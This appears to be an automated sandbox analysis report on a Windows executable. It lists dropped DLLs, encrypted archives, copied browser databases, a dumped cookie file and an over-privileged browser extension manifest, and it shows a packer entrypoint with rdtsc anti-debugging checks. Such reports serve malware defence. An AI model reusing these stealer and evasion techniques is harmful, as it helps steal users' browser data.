SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............\|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92080
Entropy (8bit):	5.923150781730819
Encrypted:	false
SSDEEP:	1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
MD5:	DBA9A19752B52943A0850A7E19AC600A
SHA1:	3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
SHA-256:	69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
SHA-512:	A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.\|...\|...\|...t...\|...p...\|...p...\|...p...\|...p...\|..~t...\|..._...\|...t...\|..~t...\|...\|..6\|..sk...\|..sk...\|...w...\|..sk...\|..Rich.\|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\download_engine.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3512776
Entropy (8bit):	6.514740710935125
Encrypted:	false
SSDEEP:	49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
MD5:	1A87FF238DF9EA26E76B56F34E18402C
SHA1:	2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
SHA-256:	ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
SHA-512:	B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	503808
Entropy (8bit):	6.4043708480235715
Encrypted:	false
SSDEEP:	12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
MD5:	A94DC60A90EFD7A35C36D971E3EE7470
SHA1:	F936F612BC779E4BA067F77514B68C329180A380
SHA-256:	6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
SHA-512:	FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<\|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.56488891304105
Encrypted:	false
SSDEEP:	6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
MD5:	CA2F560921B7B8BE1CF555A5A18D54C3
SHA1:	432DBCF54B6F1142058B413A9D52668A2BDE011D
SHA-256:	C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
SHA-512:	23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6\|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\zlib1.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	6.753320551944624
Encrypted:	false
SSDEEP:	1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
MD5:	89F6488524EAA3E5A66C5F34F3B92405
SHA1:	330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
SHA-256:	BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
SHA-512:	CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ecv37E8.tmp Download File
Process:	C:\Users\user\AppData\Roaming\1611970727133.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe7583a04, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.9544034244886906
Encrypted:	false
SSDEEP:	24576:vlLvaIxfFUziD9gNltkOuvAPIcgooIO3PX2BU:xUz2gNLkOuu
MD5:	6F872A9E59DBDC88C3A7868DADD23D2F
SHA1:	DBEC1F388806EACC0C88F2052BA0A6510B2D22CA
SHA-256:	E1C8F88F32C3E1036ED47A577974FEC63308CCD38059C8FBAC953F687BDF099B
SHA-512:	6342DE3B884FFB7071E41C5B394CEC7FB63071B22102F02E940067F5AEA6019CC4B581730D25B1228B3595549700877FE8B1D86C94A6F2109E3FC0BD194541E8
Malicious:	false
Preview:	.X:.... .......r1.......l~.."...wK..................... .g......-...x3.6-...x_.h.i..........................k.\."...w..............................................................................................Y............B.................................................................................................................. ........&...yW......................................................................................................................................................................................................................................). ,&...y......................+&...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gdiview.msi Download File
Process:	C:\Users\user\Desktop\N1yprTBBXs.exe
File Type:	;1033
Category:	modified
Size (bytes):	237056
Entropy (8bit):	6.262405449836627
Encrypted:	false
SSDEEP:	3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
MD5:	7CC103F6FD70C6F3A2D2B9FCA0438182
SHA1:	699BD8924A27516B405EA9A686604B53B4E23372
SHA-256:	DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
SHA-512:	92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
Malicious:	false
Preview:	......................>.......................................................\|.......\|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...

C:\Users\user\AppData\Local\Temp\xldl.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	1397922
Entropy (8bit):	7.999863097294012
Encrypted:	true
SSDEEP:	24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
MD5:	18C413810B2AC24D83CD1CDCAF49E5E1
SHA1:	ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
SHA-256:	9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
SHA-512:	FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
Malicious:	false
Preview:	7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.\|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~\|J^.YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....\|..n1...Y.i4\.ZN..V....U)...\|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.

C:\Users\user\AppData\Local\Temp\xldl.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	293320
Entropy (8bit):	6.347427939821131
Encrypted:	false
SSDEEP:	6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
MD5:	208662418974BCA6FAAB5C0CA6F7DEBF
SHA1:	DB216FC36AB02E0B08BF343539793C96BA393CF1
SHA-256:	A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
SHA-512:	8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Web Data1611970737586 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\crx.7z Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	36105
Entropy (8bit):	7.994610469125073
Encrypted:	true
SSDEEP:	768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:	DAFDD7237BA10D0C91295CD1C15749B2
SHA1:	45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:	B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:	50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:	false
Preview:	7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..\|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^\|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...\|....3...X.E.N.I7...]".50.6...or

C:\Users\user\AppData\Local\crx.json Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1981
Entropy (8bit):	5.365969892012237
Encrypted:	false
SSDEEP:	48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
MD5:	B5CEED4A6FA3F501787DE10B4CB02EEE
SHA1:	F09C0A8CA18D825D6CE6F192090EBD0659C7321B
SHA-256:	749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
SHA-512:	02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
Malicious:	false
Preview:	{"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http:///","https:///"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false

C:\Users\user\AppData\Localwebdata1611970737633 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1611970727133.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103632
Entropy (8bit):	6.404475911013687
Encrypted:	false
SSDEEP:	1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:	EF6F72358CB02551CAEBE720FBC55F95
SHA1:	B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:	6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:	EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 14%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\1611970727133.txt Download File
Process:	C:\Users\user\AppData\Roaming\1611970727133.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	30168
Entropy (8bit):	3.7189429930762494
Encrypted:	false
SSDEEP:	384:bYasIDQBc4gYdZ6YEIPmh/gMem6hlkS/V:bYasIDQBRgYdZFEi5MQhlksV
MD5:	D65C5C9854C0BC4ADCEFC8E3A091D20A
SHA1:	F3C57CA5C5B2B94F37D9AE7A9DDA841333C65773
SHA-256:	12F769B6CD58E9B7043A2B1F020CA2D4326F759B0E0911B93EB4E3BD69ABF129
SHA-512:	8EE2ECF4897873FDA30631DFE7D0AA9DE2F46DC16FF3D56295882AA808D13E25F30D3301020D6A6049D07DA6ACA1C2A43EF17413EA5EF85A27DA1A16EEDA53D7
Malicious:	false
Preview:	..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.0.6.:.2.3. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.S.0.".,.....".V.a.l.u.e.".:.".9.f.5.b.a.a.3.6.e.5.b.8.4.d.0.4.a.0.c.b.3.8.2.b.f.8.3.2.8.c.8.2.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".6.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.8.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.6./.2.0.2.0. .1.1.:.3.6.:.2.3. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.C.1.".,.....".V.a.l.u.e.".:.".G.U.I.D.=.6.1.3.2.9.2.3.c.e.0.7.f.4.d.d.5.9.1.6.c.7.c.5.b.c.1.7.c.e.f.8.9.&.H.A.S.H.=.6.1.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.663640140797365
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	N1yprTBBXs.exe
File size:	4999496
MD5:	f7d7c89f3f5cbc925480b46b7b934157
SHA1:	73e389b70cf3d8975ccbaf7d04f4c45cc80be860
SHA256:	2870f899f2e9ec540da321f603cfb1a735dcd06df016718e663dc78fefdf5e0a
SHA512:	9b972e2954c18f706a6f8012a6b76e1f4ce8e76466eae919b55a6225c4f8574586d9f11838d8d63bdd245b11cfd3e581248e9a578f72ff2dd8b6623bebc525eb
SSDEEP:	98304:LWrSa24w3rQ/pE/JFBCnpcYiKAEXXPnsNSkUe:iy4wesJFqpc8dXfUSe
File Content Preview:	MZ......................@............................................H.....L.!This program cannot be run in DOS mode....$.............._..._..._..E_..._..v_..._.Wp_..._.WD__.._.WE_..._..m_..._..}_..._..._H.._.WA_Q.._.Wt_..._.Ws_..._Rich..._........PE..L..

File Icon


Icon Hash:	79f8e470b2f0f083

Static PE Info

General
Entrypoint:	0x4efaf0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x53A28C1B [Thu Jun 19 07:07:07 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	580870fafb7ba77509b9cf13d8f3e2af

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 004EFAF0h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6DAh
pop eax
mov ebx, edi
push esi
add ebx, eax
mov ecx, dword ptr [eax]
popad
popfd
push 00000005h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6E3h
mov edi, ecx
ret
push edx
mov ecx, dword ptr [esi]
jmp eax
inc ecx
mov ebx, dword ptr [ecx]
mov ebp, edi
mov ebx, esi
idiv edx
popad
popfd
mov eax, 004EFE72h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6E5h
mov edi, esp
mov ebp, ebx
mov ecx, dword ptr [edx]
inc edx
mov ebx, dword ptr [ebp+00h]
mov esp, ebp
cmp eax, edx
mov ebx, esp
mov eax, dword ptr [esp]
popad
popfd
push eax
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6DFh
inc edi
mov edx, esp
mov esp, ebp
mov ebx, dword ptr [edi]
push edx
mov eax, esp
inc eax
mov ebp, edi
popad
popfd
push 000013C5h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F108C9DA6DEh
dec ebx
inc esi
idiv ecx
mov edi, esp
call esi
mov edx, esp
cmp eax, edx
popad

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[LNK] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[C++] VS2010 build 30319
[C++] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1565e4	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x162000	0xf918	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x18a000	0x1948	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x172000	0xede4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1217c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13fec0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x121000	0x63c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

